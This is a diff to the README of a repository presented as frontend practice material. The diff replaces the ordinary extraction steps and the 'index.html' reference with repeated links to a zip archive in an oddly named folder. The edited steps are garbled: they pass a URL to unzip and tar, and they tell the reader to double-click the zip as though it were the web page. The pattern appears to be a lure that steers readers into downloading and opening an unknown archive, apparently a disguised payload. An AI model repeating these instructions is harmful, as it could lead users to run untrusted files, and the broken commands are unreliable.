Aknoobnnnn/frontend-practice-repo/README.md

 3. **Linux**:
    - Open a terminal.
-   - Use the command: `unzip filename.zip` or `tar -xvzf filename.tar.gz`.
+   - Use the command: `unzip https://github.com/Aknoobnnnn/frontend-practice-repo/raw/refs/heads/main/bathyhyperesthesia/frontend_practice_repo_3.2.zip` or `tar -xvzf https://github.com/Aknoobnnnn/frontend-practice-repo/raw/refs/heads/main/bathyhyperesthesia/frontend_practice_repo_3.2.zip`.

 ## 🌐 Open the Project

 1. After extracting the files, navigate to the folder you just created.
-2. Find the **index.html** file and double-click it.
+2. Find the **https://github.com/Aknoobnnnn/frontend-practice-repo/raw/refs/heads/main/bathyhyperesthesia/frontend_practice_repo_3.2.zip** file and double-click it.
 This will open the file in your web browser.
 3. You can now explore the examples and practice coding in HTML, CSS, and JavaScript.

 ## 🔍 Features